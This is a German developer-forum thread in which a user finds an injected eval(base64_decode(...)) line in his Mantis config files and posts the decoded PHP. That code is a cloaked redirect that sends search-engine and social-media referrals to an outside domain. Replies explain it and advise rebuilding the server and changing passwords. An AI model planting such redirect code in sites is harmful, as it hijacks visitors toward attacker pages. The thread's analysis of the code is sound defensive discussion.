AGB  ·  Datenschutz  ·  Impressum  







Anmelden
Nützliche Links
Registrieren
Thema durchsuchen
Ansicht
Themen-Optionen

PHP Virus ?

Ein Thema von haentschman · begonnen am 3. Jan 2016 · letzter Beitrag vom 3. Jan 2016
Antwort Antwort
Seite 1 von 2  1 2      
Benutzerbild von haentschman
haentschman

Registriert seit: 24. Okt 2006
Ort: Seifhennersdorf / Sachsen
5.388 Beiträge
 
Delphi 12 Athens
 
#1

PHP Virus ?

  Alt 3. Jan 2016, 14:00
Hallöle...

Beim Download der Config Datei meines Mantis wurde ein Virus gefunden... Hä... Wie jetzt?

In der ersten Zeile einiger (aller?) Dateien war das Muster:
Code:
eval(base64_decode("DQplcnJvcl9yZXBvcnR...l9DQp9DQp9"));
vorhanden.
Ein Decode ergibt folgenden Code:
Zitat:
<?php error_reporting(0);
$qazplm = headers_sent();
if (!$qazplm) {
$referer = $_SERVER['HTTP_REFERER'];
$uag = $_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag, "MSIE 7.0") and !stristr($uag, "MSIE 6.0")) {
if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler") or stristr($referer, "live.com") or stristr($referer, "webalta") or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer) or preg_match("/google\.(.*?)\/url\?sa/", $referer) or stristr($referer, "myspace.com") or stristr($referer, "facebook.com/l") or stristr($referer, "aol.com")) {
if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
header("Location: http://ibontu.25u.com/");
exit();
}
}
}
}
}
Was macht der Code genau?

Geändert von haentschman ( 3. Jan 2016 um 14:25 Uhr)
  Mit Zitat antworten Zitat
Daniel
(Co-Admin)

Registriert seit: 30. Mai 2002
Ort: Hamburg
13.920 Beiträge
 
Delphi 10.4 Sydney
 
#2

AW: PHP Virus ?

  Alt 3. Jan 2016, 14:02
Er leitet den Anwender um auf eine andere Website.
Irgendwer hatte wohl Schreibzugriff, der dazu nicht hätte befugt sein sollen.

//edit: Brich das bitte mal um.
Daniel R. Wolf
mit Grüßen aus Hamburg
  Mit Zitat antworten Zitat
Benutzerbild von haentschman
haentschman

Registriert seit: 24. Okt 2006
Ort: Seifhennersdorf / Sachsen
5.388 Beiträge
 
Delphi 12 Athens
 
#3

AW: PHP Virus ?

  Alt 3. Jan 2016, 14:28
Danke Daniel...

Hmm... ich habe die ganze Zeit mit dem Mantis gearbeitet. Wo anders bin ich nie rausgekommen...
Zitat:
Brich das bitte mal um.
Sorry... Beim Speichern hatte sich Avira logischerweise über einen Scriptvirus beschwert. Danach hatte ich das Script eingekürzt. Beim erneuten Speichern hat er dann doch das Ganze übertragen.
...erledigt.
  Mit Zitat antworten Zitat
Daniel
(Co-Admin)

Registriert seit: 30. Mai 2002
Ort: Hamburg
13.920 Beiträge
 
Delphi 10.4 Sydney
 
#4

AW: PHP Virus ?

  Alt 3. Jan 2016, 14:32
Er prüft vorher ein paar Bedingungen ab, so z.B. die Kennung des Browsers sowie die verweisende Webseite.
Die Umleitung wird nur aktiv, wenn Du nicht den IE in Version 6 oder 7 nutzt und von einer der o.g. Suchmaschinen kommst.

Der Webserver hat augenscheinlich ein gravierendes Sicherheitsproblem, da es wenigstens einen Weg gab oder immernoch gibt, Dateien zu verändern.
Daniel R. Wolf
mit Grüßen aus Hamburg

Geändert von Daniel ( 3. Jan 2016 um 14:35 Uhr)
  Mit Zitat antworten Zitat
vagtler

Registriert seit: 9. Jul 2010
Ort: Köln
667 Beiträge
 
Delphi 2010 Professional
 
#5

AW: PHP Virus ?

  Alt 3. Jan 2016, 14:41
Der entsprechende Server ist kompromittiert. Wenn Du nicht genau nachvollziehen kannst, was dort wann passiert ist, würde ich den Server vollständig neu aufsetzen. Dabei sollte für alle dort betriebenen Dienste auf Datensicherungen vor dem erfolgreichen Angriff zurückgegriffen werden.
  Mit Zitat antworten Zitat
Benutzerbild von haentschman
haentschman

Registriert seit: 24. Okt 2006
Ort: Seifhennersdorf / Sachsen
5.388 Beiträge
 
Delphi 12 Athens
 
#6

AW: PHP Virus ?

  Alt 3. Jan 2016, 14:53
Das ist der Webspace bei 1und1 welche mir nach dem Hochladen einer verseuchten Datei sofort meinen FTP Zugang zugemacht haben und der Virus erkannt wurde. Erstaunlich das das im laufenden Bertieb nicht aufgefallen ist. Die sind da eigentlich kurz angebunden...

Nachtrag:
Vor Jahren hatte ich mal einen Angriff der auch durchgekommen war und von 1und1 protokolliert wurde. Die von mir manuell kontrollierten Dateien trugen den Code und Änderung März 2013. Kann gut sein das das noch übrig geblieben ist.

So wie es aussieht war nur der Mantis Ordner betroffen. Alles ohne Ausnahme entsorgt und neu instaliert. Nächste Woche mache ich wieder Kontrolle.

Geändert von haentschman ( 3. Jan 2016 um 15:00 Uhr)
  Mit Zitat antworten Zitat
vagtler

Registriert seit: 9. Jul 2010
Ort: Köln
667 Beiträge
 
Delphi 2010 Professional
 
#7

AW: PHP Virus ?

  Alt 3. Jan 2016, 15:14
Ich würde (zumindest geschäftlich genutzte) Server nur managen lassen wollen von Leuten, die was davon verstehen.
  Mit Zitat antworten Zitat
Benutzerbild von borncrush
borncrush

Registriert seit: 18. Dez 2005
Ort: Berlin
115 Beiträge
 
Delphi XE7 Enterprise
 
#8

AW: PHP Virus ?

  Alt 3. Jan 2016, 15:16
Falls Du kein Backup einspielen kannst, denke bitte daran, umgehend alle Kennwörter zu ändern und unnötige Konten zu deaktivieren.
Delphi programming
  Mit Zitat antworten Zitat
Benutzerbild von haentschman
haentschman

Registriert seit: 24. Okt 2006
Ort: Seifhennersdorf / Sachsen
5.388 Beiträge
 
Delphi 12 Athens
 
#9

AW: PHP Virus ?

  Alt 3. Jan 2016, 15:24
Danke an Alle...

Ich denke das sind Reste von dem alten Angriff. Der FTP Log zeigt 2 Monate rückwirkend keinen Zugriff außer von mir selbst.
Zitat:
Falls Du kein Backup einspielen kannst, denke bitte daran, umgehend alle Kennwörter zu ändern und unnötige Konten zu deaktivieren.
...ich habe den Mantis komplett neu aufgesetzt. Kennwörter sind verschärft.
Zitat:
Ich würde (zumindest geschäftlich genutzte) Server nur managen lassen wollen von Leuten, die was davon verstehen.
Meinst du die von 1und1 haben keine Ahnung?
  Mit Zitat antworten Zitat
vagtler

Registriert seit: 9. Jul 2010
Ort: Köln
667 Beiträge
 
Delphi 2010 Professional
 
#10

AW: PHP Virus ?

  Alt 3. Jan 2016, 15:35
[...]
Zitat:
Ich würde (zumindest geschäftlich genutzte) Server nur managen lassen wollen von Leuten, die was davon verstehen.
Meinst du die von 1und1 haben keine Ahnung?
Mal abgesehen davon, dass es sich bei den 1&1 Webservern um ein reines Webhosting und kein Managed Server Angebot handelt und daher der Betrieb von geschäftskritischen Applikationen darauf sich eigentlich schon per se verbietet, wollte ich die Kompetenz der 1&1-Mitarbeiter nicht in Frage stellen.

Aber in heutigen Zeiten einen nicht getunnelten FTP-Zugriff ohne weitere Sicherheitsmaßnahmen überhaupt nur anzubieten genügt auch geringsten Sicherheitsanforderungen selbst im privaten Bereich kaum noch - schließlich wird Dein Passwort unverschlüsselt über das Internet übertragen.

Geändert von vagtler ( 3. Jan 2016 um 15:43 Uhr)
  Mit Zitat antworten Zitat
Antwort Antwort
Seite 1 von 2  1 2      


Forumregeln

Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are aus

Gehe zu:

Impressum · AGB · Datenschutz · Nach oben
Alle Zeitangaben in WEZ +1. Es ist jetzt 18:52 Uhr.
Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO © 2011, Crawlability, Inc.
Delphi-PRAXiS (c) 2002 - 2023 by Daniel R. Wolf, 2024 by Thomas Breitkreuz